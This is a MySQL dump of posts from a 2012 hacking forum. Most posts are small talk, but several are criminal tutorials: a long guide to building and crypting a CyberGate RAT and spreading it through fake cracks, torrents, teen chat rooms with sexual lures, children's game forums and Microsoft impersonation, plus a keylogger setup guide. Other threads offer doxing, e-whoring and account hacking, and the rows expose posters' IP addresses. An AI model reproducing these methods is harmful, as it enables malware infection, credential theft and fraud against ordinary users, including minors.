'0169ba556f4c268843ac410cb32cc3e5', '0', '0'); INSERT INTO mybb_posts VALUES('891', '210', '879', '3', 'RE: Moved Successfully!!!', '0', '1', 't3h jok3r', '1345898820', '[quote=\'Sin Cara\' pid=\'877\' dateline=\'1345867378\']\r\nBest of luck for the the future of this wonderful community ;)\r\n[/quote]\r\n\r\nThanks, we are going to need it. If we have iTzIpod, Sin Cara, NXK and Apathy then we will definitely become a popular forum soon. \r\n\r\n[quote=\'iTzIpod\' pid=\'879\' dateline=\'1345867916\']\r\nSo far, the website hasn\'t been offline! I\'m impressed. :o\r\n[/quote]\r\n\r\nThanks and I also checked the downtime report and no downtime.', '41.151.149.86', '697800022', '1', '0', '0', '0', '1', '042853e50bbd285267a0b8d81a46b5cd', '0', '0'); INSERT INTO mybb_posts VALUES('892', '206', '862', '7', 'RE: Apply for SWAG', '0', '1', 't3h jok3r', '1345898916', '[quote=\'iTzIpod\' pid=\'862\' dateline=\'1345863721\']\r\n[quote=\'t3h jok3r\' pid=\'853\' dateline=\'1345858722\']\r\n[quote=\'iTzIpod\' pid=\'833\' dateline=\'1345853367\']\r\n[quote=\'t3h jok3r\' pid=\'815\' dateline=\'1345848187\']\r\n[quote=\'HoverCatz\' pid=\'812\' dateline=\'1345848103\']\r\n\r\nThanks bro :D\r\n[/quote]\r\n\r\nNo problem. You deserved it after all.\r\n[/quote]\r\n\r\n\r\n\r\nYou gotta post a picture of yourself on the forum looking all swag just to receive the award?\r\n[/quote]\r\n\r\nWe have a Help Document for the [url=http://l33thacking.com/misc.php?action=help&hid=12]Awards Sytem[/url]. To get the swag award, you have be FLEE (In other words, cool or unique). You can get the swag award by showing us some expensive merchandise or a unique accessories/clothing/footwear product.\r\n[/quote]\r\n\r\n\r\nSeems cool. Worth a shot! Might try it tomorrow.\r\n[/quote]\r\n\r\nNo problem, Good Luck!', '41.151.149.86', '697800022', '1', '0', '0', '0', '1', '7faa80279731f362b0e4ff54f1505653', '0', '0'); INSERT INTO mybb_posts VALUES('893', '43', '832', '7', 'RE: How did you find us?', '0', '1', 't3h jok3r', '1345898932', '[quote=\'iTzIpod\' pid=\'832\' dateline=\'1345853213\']\r\n[quote=\'t3h jok3r\' pid=\'810\' dateline=\'1345847940\']\r\n[quote=\'Apathy\' pid=\'779\' dateline=\'1345826158\']\r\nI helped start it with you... :P\r\n[/quote]\r\n\r\nI remember this part and the time when I introduced you to Reborn. \r\n\r\n\r\n[quote=\'iTzIpod\' pid=\'768\' dateline=\'1345822951\']\r\n[quote=\'t3h jok3r\' pid=\'763\' dateline=\'1345821692\']\r\n[quote=\'iTzIpod\' pid=\'627\' dateline=\'1345668585\']\r\nWhat? What do you mean took my username? :o\r\n[/quote]\r\n\r\nYou said \"I\'m from t3h jok3r\"\r\n[/quote]\r\n\r\nOh. I meant it as in you referred me :3 Since I came from TP. And your username is L33t Hacking on TP.\r\n[/quote]\r\n\r\nLol now I get it ;)\r\n[/quote]\r\n\r\n\r\nSorry for the mix up =]\r\n[/quote]\r\n\r\nNo problem.', '41.151.149.86', '697800022', '1', '0', '0', '0', '1', 'ec44be2755ec2694d90a31864a0dcdc5', '0', '0'); INSERT INTO mybb_posts VALUES('894', '197', '696', '56', 'RE: /me Thread', '0', '1', 't3h jok3r', '1345898969', '/me likes the cookie. Can I have more?', '41.151.149.86', '697800022', '1', '0', '0', '0', '1', '95145adead831af43471e5f516a566e5', '0', '0'); INSERT INTO mybb_posts VALUES('895', '181', '605', '54', 'RE: Fresh 22 Aug HoT [ Brazzers / Mofos / Xhamster / Youjizz .... MorE ] HoT', '0', '119', 'Neal Caffrey', '1345899596', 'It didn\'t let me download any of them, but thanks for the gesture anyway!', '216.38.2.194', '-668597566', '0', '0', '0', '0', '1', '2e1ff2b7b1d5fddce4dcaed5a47a9398', '0', '0'); INSERT INTO mybb_posts VALUES('896', '79', '189', '29', 'RE: [tut]How to ruin somones life[DOX]', '0', '119', 'Neal Caffrey', '1345899712', 'Haha, I can see how that would piss off people xD', '216.38.2.194', '-668597566', '0', '0', '0', '0', '1', '54b779589fcf7877000e078764a12ee4', '0', '0'); INSERT INTO mybb_posts VALUES('897', '152', '563', '30', 'RE: [Free] Magic Traffic Bot! [Worth $29.99]', '0', '119', 'Neal Caffrey', '1345899801', '[quote=\'Sin Cara\' pid=\'563\' dateline=\'1345559898\']\r\n[quote=\'iTzIpod\' pid=\'489\' dateline=\'1345520696\']\r\nHere\'s a virus scan for you OP! [url=https://www.virustotal.com/file/866c980f6001ff281d90974977c24a209d058bb506fe542a3c6ec5b6b9946660/analysis/1345520468/] Virus Scan[/url]\r\n\r\n\r\nYou\'re welcome.\r\n[/quote]\r\n\r\nThanks dude for virus scan ;)\r\n[/quote]\r\n\r\nIt shows up as 1/41 for some reason... o.o\r\nTrojan? LOL.', '216.38.2.194', '-668597566', '0', '0', '0', '0', '1', 'b15dfb7d03018a12ad2b61e594ad75a9', '0', '0'); INSERT INTO mybb_posts VALUES('898', '197', '894', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1345900864', '[quote=\'t3h jok3r\' pid=\'894\' dateline=\'1345898969\']\r\n* t3h jok3r likes the cookie. Can I have more?\r\n[/quote]\r\n\r\n/me slaps t3h jok3r with a fish for asking for more cookies without saying please. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0e5203551b4ed80ab92645901adcbcbb', '0', '0'); INSERT INTO mybb_posts VALUES('899', '220', '0', '55', 'Windows 7 Ultimate', '0', '112', '??????Z', '1345901648', 'my computer is turning into a slow POS and i have been trying to track down a cracked version of windows 7 ultimate. all i have found so far either don\'t work or a pay to download. could someone help me out? thanks', '92.22.242.209', '1545007825', '0', '0', '112', '1345901675', '1', '209c6c61caa62e2cd37c9dd3bf10fcb8', '0', '1345901675'); INSERT INTO mybb_posts VALUES('900', '221', '0', '7', 'L33t Hacking Advertisement Video', '0', '82', 'iTzIpod', '1345903215', '[video=youtube]http://www.youtube.com/watch?v=yA2swuq4YsM[/video]\n\n\nSo far, a lot of views in less than 24 hours!\nAnd a whooping 20+ Likes :o\n\n\n\nCredits: NXK\n\nI do not take any credit for this video. All credits go to NXK for making this.\n\n\n\nEDIT: I guess the [video][/video] doesn\'t work. :/', '24.212.197.164', '416597412', '1', '0', '82', '1345951883', '1', '9a50d03288fbd063282006c62ab0880c', '0', '1345951883'); INSERT INTO mybb_posts VALUES('901', '134', '341', '47', 'RE: Win $10 for referring people', '0', '82', 'iTzIpod', '1345904080', 'Referred 4 members so far. Will be referring more!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '82db34704fd15412e30bee5712dee43d', '0', '0'); INSERT INTO mybb_posts VALUES('902', '210', '835', '3', 'RE: Moved Successfully!!!', '0', '90', 'duhuh', '1345904194', 'i did think it loaded up very quickly just now, good job :)', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', '30b5e00e784efbad6ea471c94f2359a8', '0', '0'); INSERT INTO mybb_posts VALUES('903', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '90', 'duhuh', '1345904241', 'could i get this please? thanks', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', 'c3e808bedb797d55402431651c4c424f', '0', '0'); INSERT INTO mybb_posts VALUES('904', '221', '900', '7', 'RE: L33t Hacking Advertisement Video', '0', '53', 'sirchamp', '1345904744', 'Nice even tough the quality could be better.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'efb38d532df92b7ed580c66ea5349cb6', '0', '0'); INSERT INTO mybb_posts VALUES('905', '222', '0', '34', 'Music Man Signature Tutorial', '0', '82', 'iTzIpod', '1345905811', '[img]http://fc09.deviantart.net/fs24/f/2007/325/f/f/Music_Man_Signature_Tutorial_by_SH_Archaeologist.png[/img]\n\n\nOriginal Link: http://sh-archaeologist.deviantart.com/art/Music-Man-Signature-Tutorial-70326440\nCredits: SH Archaeologist\nEnjoy~ Good luck making it!', '24.212.197.164', '416597412', '1', '0', '82', '1347719035', '1', 'd1c8588cd2f06368aa872b480ead3759', '0', '1347719035'); INSERT INTO mybb_posts VALUES('906', '223', '0', '34', 'Versus Signature Tutorial', '0', '82', 'iTzIpod', '1345906030', '[img]http://fc04.deviantart.net/fs19/f/2007/303/d/b/Versus_Signature_Tutorial_by_thekellz.jpg[/img]\nOriginal Link: http://thekellz.deviantart.com/art/Versus-Signature-Tutorial-68632436\nCredits: thekellz\nGood luck making this! Enjoy~', '24.212.197.164', '416597412', '1', '0', '82', '1347719040', '1', '367b854764ef02268fbfe159ae4ffde2', '0', '1347719040'); INSERT INTO mybb_posts VALUES('907', '224', '0', '34', 'Metroid Signature Tutorial', '0', '82', 'iTzIpod', '1345906134', '[img]http://fc04.deviantart.net/fs18/f/2007/146/7/9/Metroid_Signature_Tutorial_by_MPCoyote.jpg[/img]\nOriginal Link: http://mpcoyote.deviantart.com/art/Metroid-Signature-Tutorial-50490347\nCredits: MPCoyote\nEnjoy~ Good luck making the signature!', '24.212.197.164', '416597412', '1', '0', '82', '1347719046', '1', '748a9e7b92ef59e90c714e4d93ca3c7d', '0', '1347719046'); INSERT INTO mybb_posts VALUES('908', '152', '897', '30', 'RE: [Free] Magic Traffic Bot! [Worth $29.99]', '0', '54', 'Sin Cara', '1345906537', '[quote=\'Neal Caffrey\' pid=\'897\' dateline=\'1345899801\']\r\n[quote=\'Sin Cara\' pid=\'563\' dateline=\'1345559898\']\r\n[quote=\'iTzIpod\' pid=\'489\' dateline=\'1345520696\']\r\nHere\'s a virus scan for you OP! [url=https://www.virustotal.com/file/866c980f6001ff281d90974977c24a209d058bb506fe542a3c6ec5b6b9946660/analysis/1345520468/] Virus Scan[/url]\r\n\r\n\r\nYou\'re welcome.\r\n[/quote]\r\n\r\nThanks dude for virus scan ;)\r\n[/quote]\r\n\r\nIt shows up as 1/41 for some reason... o.o\r\nTrojan? LOL.\r\n[/quote]\r\nIt\'s works fine for me and its not a virus.', '119.154.66.18', '2006598162', '1', '0', '0', '0', '1', '59de8dd71a27b713e27c91bf81f96931', '0', '0'); INSERT INTO mybb_posts VALUES('909', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '54', 'Sin Cara', '1345906750', 'So are you going to make it official????', '173.245.53.158', '-1376438882', '1', '0', '0', '0', '1', '25dd3071ba57c3343b1845e680d25081', '0', '0'); INSERT INTO mybb_posts VALUES('910', '112', '903', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '54', 'Sin Cara', '1345906804', '[quote=\'duhuh\' pid=\'903\' dateline=\'1345904241\']\r\ncould i get this please? thanks\r\n[/quote]\r\n\r\n PPD ebooks pack is sent... check your pm now.', '173.245.53.158', '-1376438882', '1', '0', '0', '0', '1', '304551246fa90bf6f2175da82a53ab2d', '0', '0'); INSERT INTO mybb_posts VALUES('911', '203', '739', '16', 'RE: [Limited] Free SEing Help', '0', '116', '@SSASIN', '1345907886', 'Could i also receive your help please, thanks in advance.\n\nSkype- abdiz08', '78.148.241.66', '1318383938', '0', '0', '0', '0', '1', 'bbb5c248edda7735ac0092567b7e71ab', '0', '0'); INSERT INTO mybb_posts VALUES('912', '38', '98', '16', 'RE: [tut] How to lie like a pro', '0', '116', '@SSASIN', '1345908293', 'Good tutorial, why dont people who lie just use common sense.\n\n1) Upright stance\n2) Dont change subject\n3) Dont change what you already said', '78.148.241.66', '1318383938', '0', '0', '0', '0', '1', '2a6aa4ea1152d80ef7361be84df68401', '0', '0'); INSERT INTO mybb_posts VALUES('913', '186', '638', '16', 'RE: SE razor?', '0', '116', '@SSASIN', '1345908457', 'I also need the help, but I reckon Im going to buy the item for the PID and proof of purchase.', '78.148.241.66', '1318383938', '0', '0', '0', '0', '1', '504487bd9587b6c15fe7e3c2e64b373a', '0', '0'); INSERT INTO mybb_posts VALUES('914', '225', '0', '7', 'E-whoring Ebook very soon :)', '0', '54', 'Sin Cara', '1345908712', 'Just making an ebook on private e-whoring method.Using that method you will be able to make a lot of $$$. Also this ebook will not free for all members except [color=#FF0000]t3h jok3r[/color] as i trust him. Just posting this thread to know, who has interest in e-whoring.\r\n\r\n\r\nRegards\r\nSin Cara', '173.245.53.158', '-1376438882', '1', '0', '0', '0', '1', '84d5e5160bf27148936449db929f8cdb', '0', '0'); INSERT INTO mybb_posts VALUES('915', '203', '739', '16', 'RE: [Limited] Free SEing Help', '0', '62', 'R?????zo?', '1345908744', 'I\'d love this but apparently I\'m too late :(', '89.214.202.231', '1507248871', '1', '0', '0', '0', '1', 'c94d444f2fb24b198102d4acce4f1d37', '0', '0'); INSERT INTO mybb_posts VALUES('916', '41', '103', '15', 'RE: Virus O Matic.. Virus Creator', '0', '48', 'BurnsH4X', '1345908751', 'its a very nice very fun to use and very easy also is funny to see the reaction of your brother freeing out as the gay p0rn opens and task manger is deactivated', '46.11.104.187', '772499643', '0', '0', '48', '1345984494', '1', 'cba6d4a576e708c485011cbde88de70d', '0', '1345984494'); INSERT INTO mybb_posts VALUES('917', '32', '87', '16', 'RE: [tut]How to SE Amazon Kindles', '0', '116', '@SSASIN', '1345909036', 'I also need some help, Ive Pmed you', '209.73.137.238', '-783709714', '0', '0', '0', '0', '1', 'aee873d72810ca019f39dca34bbd93cc', '0', '0'); INSERT INTO mybb_posts VALUES('918', '130', '325', '15', 'RE: Skype IP Finder - FREE', '0', '48', 'BurnsH4X', '1345909041', 'is there any working versions?', '46.11.104.187', '772499643', '0', '0', '0', '0', '1', 'a88e4390888a25d9429ce62cd592ad0b', '0', '0'); INSERT INTO mybb_posts VALUES('919', '226', '0', '11', 'A Newbies Guide', '0', '54', 'Sin Cara', '1345910367', '[color=#FFD700]Q: What is hacking?[/color]\r\n[color=#98FB98]A:[/color] The terms \"hack\" are also used to refer to a modification of a program or device to give the user access to features that were otherwise unavailable, such as DIY circuit bending. It is from this usage that the term \"hacking\" is often incorrectly used to refer to more nefarious criminal uses such as identity theft, credit card fraud or other actions categorized as computer crime\r\n[color=#FFD700]\r\nQ: What is cracking?[/color]\r\n[color=#98FB98]A:[/color] Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password. The purpose of password cracking might be to help a user recover a forgotten password (though installing an entirely new password is less of a security risk, but involves system administration privileges), to gain unauthorized access to a system, or as a preventive measure by system administrators to check for easily crackable passwords. On a file-by file basis, password cracking is utilized to gain access to digital evidence for which a judge has allowed access but the particular file\'s access is restricted.\r\n\r\n[color=#FFD700]Q: What is a virus/trojan/malicious script?[/color]\r\n[color=#98FB98]A:[/color] A computer virus is a computer program that can copy itself and infect a computer. The term \"virus\" is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability. A true virus can only spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer..\r\n\r\n[color=#FFD700]Q: What is a stealer?[/color]\r\n[color=#98FB98]A:[/color] A stealer is a software designed to create viruses. This virus is called as a server. You send the server to the victim and if they open it all their passes (according to how the stealer is built) will be sent to you via email, or ftp or a php webhost.\r\n\r\n[color=#FFD700]Q: What is a RAT?[/color]\r\n[color=#98FB98]A:[/color] A Rat is a software created that created similar servers (virus). If the victim opens it they will be your RAT. You can have a complete access to their system. There are hundereds of features.\r\nRAT - Remote Administration Tool.\r\n[color=#FFD700]\r\nQ: What is a keylogger?[/color]\r\n[color=#98FB98]A:[/color] A keylogger is a software designed to create servers. You send the server to the victim and if they open it all their keystrokes would be sent you via email, ftp, php webhost etc.\r\n\r\n[color=#FFD700]Q: What is BOT?[/color]\r\n[color=#98FB98]A:[/color] A bot is a malicious program which has several purposes. \r\nThey are usually told what to do by a botnet admin although many of the features now are automated.\r\n\r\n[color=#FFD700]Q: What is a BOTNET?[/color]\r\n[color=#98FB98]A:[/color] A botnet is a network of infected computers that all connect to one area where they are commanded by the botnet admin.\r\n\r\n[color=#FFD700]Q: What is a crypter?[/color]\r\n[color=#98FB98]A:[/color] All your servers that you create of a keylogger, stealer, RATs etc. are detected by antivirus. So inorder to make it FUD (Fully UnDetectable) we use a crypter and crypt your infected server.\r\n\r\n[color=#FFD700]Q: How does a crypter work?[/color]\r\n[color=#98FB98]A:[/color] A crypter has a built in or external file called stub. This stub is based on common encryptions like rc4, xor, tweafish, blowfish etc. When you crypt your infected file the crypter embeds the stub onto your server and covers the server. Just like how you paint your rusted metals. And makes it undetectable from anti-virus.\r\n\r\n[color=#FFD700]Q: What is reverting?[/color]\r\n[color=#98FB98]A:[/color] Reverting is a technique used to obtain forgotten passwords. But a hacker uses this method to access the victims account.\r\n[color=#FFD700]\r\nQ: What is social engineering?[/color]\r\n[color=#98FB98]A:[/color] It is a psychological approach, where you manipulate people into performing actions or divulging confidential information, rather than by breaking in or using technical hacking techniques (essentially a fancier, more technical way of lying).\r\n[color=#FFD700]\r\nQ: What is DDos?[/color]\r\n[color=#98FB98]A:[/color] DOS - Denial Of Service.\r\nThis is using bots. If you have a large number of bots you make them send packets to the target site and make them break down.\r\n\r\n[color=#FFD700]Q: How is website and forum hack possible?[/color]\r\n[color=#98FB98]A:[/color] There are lots of methods. The most basic one is you find exploits on a webserver and use them to gain access and deface it.\r\nSql, XSS, LFI, RFI, DNS poisoning etc.\r\n\r\n[color=#FFD700]Q: Can everyone be h4k5er?[/color]\r\n[color=#98FB98]A:[/color] No, u need a brain and common sense.\r\n\r\n\r\n[color=#32CD32]Copyright and credits\r\nBy ProVirus\r\n[/color]', '173.245.53.158', '-1376438882', '1', '0', '0', '0', '1', '9d252f85d853dc69943b62ed232b0d8c', '0', '0'); INSERT INTO mybb_posts VALUES('920', '227', '0', '13', 'hack twitter?', '0', '62', 'R?????zo?', '1345910796', 'anybody knows how to hack twitter?\r\nthis kid is messing up with my gf and saying stuff about me, i would like to fuck up his twitter account/delete what he said.', '89.214.202.231', '1507248871', '1', '0', '0', '0', '1', 'a39a7dcf6f09e1a29143ba522cceadec', '0', '0'); INSERT INTO mybb_posts VALUES('921', '228', '0', '12', '[TUT] A complete guide to RAT', '0', '54', 'Sin Cara', '1345911097', 'Let\'s begin off by understanding what is this process of Ratting.\r\n\r\n[color=#FF6347]What is RAT?[/color]\r\nRAT stands for Remote Access Tool. It allows to access a system remotely without having physical access to the system. It is basically a service that is available in Windows OS known as remote services. It is used to connect to the network system remotely. Simple Remote Desktop Connection and RADIUS servers are the two common methods of doing this.\r\nSo we will exploit this service to get unauthorized access. There are many famous tools that allows us to do the following like blackshades, crybergate, cerberus, turkojan etc.\r\nSo here we will be discussing about cybergate.\r\n[color=#FF6347]\r\nSo how will cybergate work?[/color]\r\nIn cybergate you can create servers (infected exes). If you victim opens this file you will be able to RAT him.\r\n\r\n[color=#FF6347]Will the server(infected file) that I create will be picked up by Anti-Virues?[/color]\r\nYes, it will be. You will need to crypt is using a crypter or use other methods like Hexing.\r\n\r\nOki so lets get to the practical part:-\r\n[IMG]http://www.auplod.com/u/daluop16abc.png[/IMG]\r\nSo lets create the no-ip account first.\r\n\r\n\r\n[color=#FFD700][size=large]I - Create No-IP Account:-[/size][/color]\r\n[spoiler]1) Goto [url=http://www.no-ip.com]No-IP.com[/url] and register and account.\r\n2) Login to your account.\r\n3) Click on this [img]http://www.picsend.net/images/294525PBEWPXOMNXMBFVXI.jpg[/img]\r\n4) Keep the same setting as in the picture. And click on create host.\r\n[spoiler][img]http://www.picsend.net/images/609606RHMCIKBRVKTZFOSF.jpg[/img][/spoiler]\r\n5) Now goto [url=https://www.no-ip.com/downloads.php]this page[/url] and download the no-ip client.\r\n6) Open the downloaded client and install it.\r\n7) Open the installed No-IP Duc client.\r\n8) Now give in your login details and you will see the created host.\r\n9) Remove the checkbox and again check it.\r\n[spoiler][img]http://www.picsend.net/images/4978UOXHKZRVLHDTYGTP.jpg[/img][/spoiler]\r\n10) Minimize your no-ip duc\r\n\r\nRemember you always need to open your no-ip client and click the check box to get [img]http://www.picsend.net/images/224520JQBMVXNNSHJJJGFZ.jpg[/img] smiley whenever you are going to control your RATs.[/spoiler]\r\n\r\n\r\n[color=#FFD700][size=large]II - Port Forwarding:-[/size][/color]\r\n[spoiler]What is Port Forwarding?\r\nAns:- Port forwarding or port mapping is the forwarding of a TCP/IP packet in a network address translator gateway to a predetermined network (which will be our No-IP Account)\r\n\r\n\r\nMethods:- \r\n[u]a) Goto [url=http://www.crackhackforum.com/thread-3993.html]this tutorial[/url] and follow the steps. Thanks to lyle for this tutorial.[/u]\r\n\r\n[u]\r\nb) The hard way but better if you need to learn.[/u]\r\n1) Find out your gateway.\r\n2) Goto Start----> Run\r\n3) Type in \"cmd\"\r\n4) Now type \"ipconfig\" and click enter\r\n5) And you will get the gateway IP.\r\n[spoiler][img]http://www.picsend.net/images/27648VIQRLLTGDGAWIUFY.jpg[/img][/spoiler]\r\n6) Now type the gateway IP in your web browser.\r\n7) It will ask for username and password.\r\n8) You can find your username and password from a sticker behind your router. Most of the time the user and pass will be \"admin\".\r\n9) After successful login to your router you will be able to see options for portfowarding.\r\n10) Forward port \"100\" to your local IP.\r\n\r\nIf you need some more help to do this you need to goto [url=http://portforward.com/english/routers/port_forwarding/routerindex.htm]this link[/url] and select your router and check for a tutorial there.\r\n\r\n\r\nTo check whether port \"100\" is open. Goto [url=http://www.canyouseeme.org]this link[/url] and type in port 100 and check the result.\r\n[/spoiler]\r\n\r\n\r\n\r\n\r\n[color=#FFD700][size=large]III - Creating a server:-[/size][/color]\r\n[spoiler]\r\n1) Close your anti-virus. Since this type of virus/trojan builders are detected by anti-viruses as a false positive. \r\n2) Download [url=http://www.fileserve.com/file/WdfHCCx]this link[/url].\r\n3) Unrar/Decompress it and open \"CyberGate v1.07.5.exe\"\r\n4) Wait for 20 seconds untill the disclaimer notice is scrolled over.\r\n5) Click on Control Center and click \"Start\".\r\n6) A box will pop up. Give the settings as in the picture below\r\n[spoiler][img]http://www.picsend.net/images/586306PLHXEWOPBXUITEZZ.jpg[/img][/spoiler]\r\n7) If any Windows Firewall box pops up click \"Allow access\".\r\n8) Goto Control Center -----> Builder ----> Create Server.\r\n9) A new box pops up. Click \"Add User\". Type in a username.\r\n10) Double click the created username.\r\n11) Follow the below pic.\r\n[spoiler][img]http://www.picsend.net/images/459379CJBYENPOUVOEQKUB.jpg[/img][/spoiler]\r\n12) Follow this pic.\r\n[spoiler][img]http://www.picsend.net/images/208659OGSZZRPFBHJJFFRO.jpg[/img][/spoiler]\r\n13) Follow the next pic\r\n[spoiler][img]http://www.picsend.net/images/87672OKRYKFLGZHBZIUHQ.jpg[/img][/spoiler]\r\n14) Follow the below pic.\r\n[spoiler][img]http://www.picsend.net/images/551972VBJBUBUJBPKFZYIV.jpg[/img][/spoiler]\r\n\r\nSo you created a server binded to some file. [/spoiler]\r\n\r\n\r\n[color=#FFD700][size=large]IV - Crypting the created server:-[/size][/color]\r\n[spoiler]The server that you created will be detected by lots of anti-viruses. You need to get it FUD (Fully UnDetectable) by crypting it with a crypter or by using other methods like hexing.\r\n\r\nIam not going in detail about it on this thread. You could buy a good FUD crypter and crypt your server which will be the easy method.[/spoiler]\r\n\r\n[color=#FFD700][size=large]V - Spread your server:-[/size][/color]\r\n[spoiler]Now its all set, you need to spread the server.\r\n1. [color=#FFD700][size=medium]Youtube[/size][/color] - YouTube is a video sharing website on which users can upload and share videos, millions of people are online... Now , make a video bout a crack , like For Adobe Photoshop , VB.Net , Teamviewer ,(These were just the examples) or any Games , then get your virus FUD(recommended) and Make a video and post. Now , i know alot of people do this , but they dont do 1 thing right. SPreading the video. \r\n\r\nHow to do this???\r\n\r\nGO to [url]www.youtube.com[/url] and click on Videos , then click on Most Viewed , and then choose All Time\r\n\r\nThen go to every single video that has alot of views and post this:\r\n\r\nWow look what i found click on my name and watch the video , it will get ur free shit etc etc.. .\r\n\r\nThen you will get loads of people infected.\r\n\r\n2.[color=#FFD700][size=medium]Torrents[/size][/color] - This is the most effective way. First you need a torrent client, I use uTorrent, because it\'s the easiest.Once you get your torrent client, Get some fake stuff , like Steam games Keygen or Cracks or w/e and then put them in a .rar file and put the keylogger on it. (BIND IT) . Now you gotta create the torrents.Open uTorrent , and then go to File -> Create New Torrent And add your .rar file on it, okay so now trackers are needed... These are some good ones:\r\n\r\n\r\nThen click START SEEDING. Now .. CLick Create -> Save AS... and save anywhere u want \r\nAfter you saved , go to [url]www.thepiratebay.org[/url], Register and upload your torrent\r\n\r\n3.[color=#FFD700][size=medium]Chat Rooms[/size][/color] - This is slow but you get adult people ( You can get credit cards and paypals from this). First of all , go to any chat room from any of these below:\r\n\r\n[quote]1.[url]http://www.chat-avenue.com/teenchat.html[/url]\r\n2.[url]http://www.chat-avenue.com/adultchat.html[/url]\r\n3.[url]http://www.321teenchat.com/[/url]\r\n4.[url]http://www.javachatrooms.net/[/url]\r\n5.[url]http://www.freechatnow.com/[/url][/QUOTE]\r\n\r\nAnd then , upload your file to any free file hosting such as sharesend and then go to chat rooms , and start spamming \"16/F/uk huge boobs wanna see my naked pics ? go here <insert link> and tell me if u like it!!\r\n\r\nOR\r\n\r\nSpam this:\r\n\r\nAdd me on msn will send u naked pics of me <ur msn here> im hornyyy xxx \r\nAnd after they add u send link from there ( this is a better method than the first one .. but this is a lil boring)\r\n\r\n4.[color=#FFD700][size=medium]Forums[/size][/color] - I used to do this when i first started using keyloggers , it was pretty fun actually. [color=#FF6347]NEVER TRY IT ON CRACK HACK FORUM[/color] :cool:\r\n\r\nFirst you go to any gaming forum such as [url]www.mpgh.net[/url] and create a new thread with the name \"Free All In One CrossFire HACK\" and then post a fake virus scan of ur file and put download link , you will get alot of 12-17 years old kids who play all day RPG games...\r\n\r\n5.[color=#FFD700][size=medium]Impersonating Microsoft[/size][/color] - This one doesnt work very well , but you can use this for targeting. First of all go to [url]www.passport.net[/url] and make a @microsoft.co.uk email... then , add someone you want on that msn and tell him : A new virus has been detected , for your safety , we need you to download this file < LINK> or else your computer may be in danger.\r\n\r\n[/spoiler]\r\n\r\nHope you understand about RATing from this tutorial.\r\n[b]\r\nCredits to :[/b][color=#DAA520]ProVirus[/color]', '173.245.53.158', '-1376438882', '1', '0', '0', '0', '1', '39215239d290f36cac93ad4629d7e52d', '0', '0'); INSERT INTO mybb_posts VALUES('922', '2', '4', '34', 'RE: Userbar tut', '0', '82', 'iTzIpod', '1345912169', '[img]http://i.imgur.com/rKDZL.png[/img]\n\nMy results. Changes some stuff up. \nThis will probably be my Usergroup Name.\n\nUnique?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '68367171f5f1829777b24f3c1b3b0240', '0', '0'); INSERT INTO mybb_posts VALUES('923', '229', '0', '12', 'How to setup a Keylogger [tut]', '0', '53', 'sirchamp', '1345913509', 'Since there wasnt any Tutorial on setting your own Keylogger up, I decided to make one.\r\nMy favourite Keylogger is the Project Neptune one. \r\n\r\n\r\n\r\n[size=x-large][color=#FF0000]Tutorial:[/size][size=medium][/color][color=#FFFFFF]\r\n\r\n1. Download the Keylogger here : http://project-neptune.net/download/\r\n\r\n2. Save the file somewhere and start the Project Neptune.exe\r\n\r\n3. Now choose the settings you want.\r\n [img]http://i45.tinypic.com/2hz62it.jpg[/img]\r\n\r\n\r\n4. Here you can leave the settings as they are\r\n[img]http://i47.tinypic.com/34g226s.jpg[/img]\r\n\r\n5. Here you can also leave the settings here.\r\n[img]http://i47.tinypic.com/34q1h83.jpg[/img]\r\n\r\n6.Here Write an error message here and choose the settings you want.\r\n[img]http://i46.tinypic.com/2ljltlf.jpg[/img]\r\n\r\n7. Press the buttons as on the picture: [img]http://i50.tinypic.com/zshag.jpg[/img]\r\n\r\n8. And save the file wherever you want and name it wathever you want.\r\n[img]http://i50.tinypic.com/sqrsyf.jpg[/img]\r\n\r\n9. Now go to your file and upload it to somewhere. And spread the link. You will reacive the keylogg text files under the email you chose in step 3.\r\n\r\n10. And as soon as someone has downloaded the virus on his computer you should get an email with his information and all the keylogged stuff .\r\n[img]http://i48.tinypic.com/347f9lw.jpg[/img][/color][/size]\r\n\r\nTutorial by sirchamp', '188.155.56.90', '-1130678182', '1', '0', '53', '1345913562', '1', 'b752297a177a5e4a8d4af7ddf6f0fe4a', '0', '1345913562'); INSERT INTO mybb_posts VALUES('924', '195', '688', '39', 'RE: [Selling] Cheap Netflix Accounts', '0', '82', 'iTzIpod', '1345916462', 'Updated thread. Added Thread Design. xD I failed at the Contact Info part.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2d5c19f75ce2eac48284c9d354662f72', '0', '0'); INSERT INTO mybb_posts VALUES('925', '230', '0', '34', 'Graphics Resources [100000\'s of free resorces]', '0', '54', 'Sin Cara', '1345917649', '[color=#006400][b]Tutorials List:[/b][/color]\r\n\r\nhttp://psd.tutsplus.com/\r\nhttp://photoshoptutorials.ws/\r\nhttp://www.tutorialized.com/tutorials/Photoshop/1\r\nhttp://www.good-tutorials.com/tutorials/photoshop\r\nhttp://www.planetphotoshop.com/category/tutorials\r\nhttp://www.sketchpad.net/photoshp.htm\r\nhttp://www.luv2help.com/\r\nhttp://www.goodtutorials-ps.com/\r\nhttp://www.tutorialhero.com\r\nhttp://www.pixel2life.com\r\nhttp://www.zymic.com\r\nhttp://www.sigvault.com\r\nhttp://www.interfaceuniversity.com (Interface Tutorials)\r\nhttp://artwiki.wikidot.com/\r\nhttp://www.eyesondesign.net/pshop/tuts.htm (Mostly Interface)\r\nhttp://www.photoshopguides.com/tutorial-1143\r\nhttp://www.melissaclifton.com/ (Vector 